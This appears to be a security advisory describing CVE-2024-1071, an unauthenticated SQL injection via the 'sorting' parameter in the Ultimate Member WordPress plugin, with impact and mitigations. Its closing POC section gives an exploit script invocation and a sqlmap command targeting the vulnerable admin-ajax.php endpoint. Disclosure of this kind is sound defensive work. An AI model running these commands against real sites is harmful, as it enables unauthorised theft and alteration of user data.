WordPress Ultimate Member SQL Injection – CVE-2024-1071

Vendor Description:-

The Ultimate Member plugin for WordPress is a robust and user-friendly membership plugin that enables website owners to easily establish and manage user profiles, communities, and membership sites. It includes configurable user roles, front-end registration and login forms, user directories, content restrictions, and more. The plugin is frequently used for social networking sites, online communities, and membership-based platforms. It provides a fully configurable experience with add-ons for increased functionality, such as private messaging, WooCommerce integration, and paid memberships.

CVE-2024-1071 Vulnerability Description: –

The Ultimate Member plugin contains a vulnerability related to the ‘sorting’ parameter, which plays a key role in managing user interactions within the plugin. This parameter is specifically associated with the /wp-admin/admin-ajax.php endpoint, which processes sorting requests and displays user data. It is actively used when viewing profiles or managing community content.

The core issue stems from insufficient validation and sanitization of user input for the ‘sorting’ parameter. Because of this, any input—malicious or otherwise—can pass through the system unchecked. The plugin dynamically constructs SQL queries based on user input, which then interact with the backend database. This flaw makes it possible for attackers to manipulate queries, potentially leading to SQL injection.

A major concern is that this attack does not require authentication, meaning that an attacker can exploit the vulnerability without needing access to the system. This significantly increases the risk level and underscores the need for an immediate security fix.

Furthermore, users who have enabled the “Enable custom table for usermeta” setting in the plugin configuration are at even greater risk, as this option increases the potential impact of an exploit. Addressing this vulnerability should be a priority for website administrators using the Ultimate Member plugin.

Impact:-

• Unauthorized Data Access – Attackers can extract sensitive user data, including emails, passwords (hashed), and other private details.
• Database Manipulation – Malicious queries can modify, delete, or insert data, potentially disrupting the website.
• No Authentication Required – The attack can be performed without logging in, making any site with this plugin vulnerable.
• Full Site Compromise – If combined with other exploits, attackers may gain full control over the website, leading to defacement, malware injection, or a complete takeover.

Mitigations:-

• Update the Plugin Immediately – The developers have fixed the issue in version 2.8.3, released on February 19. Make sure to update the Ultimate Member plugin as soon as possible to stay protected. Attackers are quick to exploit security flaws, so keeping your plugins up to date is essential.
• Disable the “Enable Custom Table for Usermeta” Option – If this setting is turned on in the plugin, your site is at a higher risk. Disabling it can help reduce the chances of an attack using this vulnerability.

POC

Exploit link:- Click me

python3 exploit.py http://<target-url>

sqlmap -u {args.url}/wp-admin/admin-ajax.php --method POST --data "{data}" --dbms mysql --technique=T -p sorting

Reference link:-

https://www.enciphers.com/exploiting-cve/ultimate-member-plugin-cve-2024-1071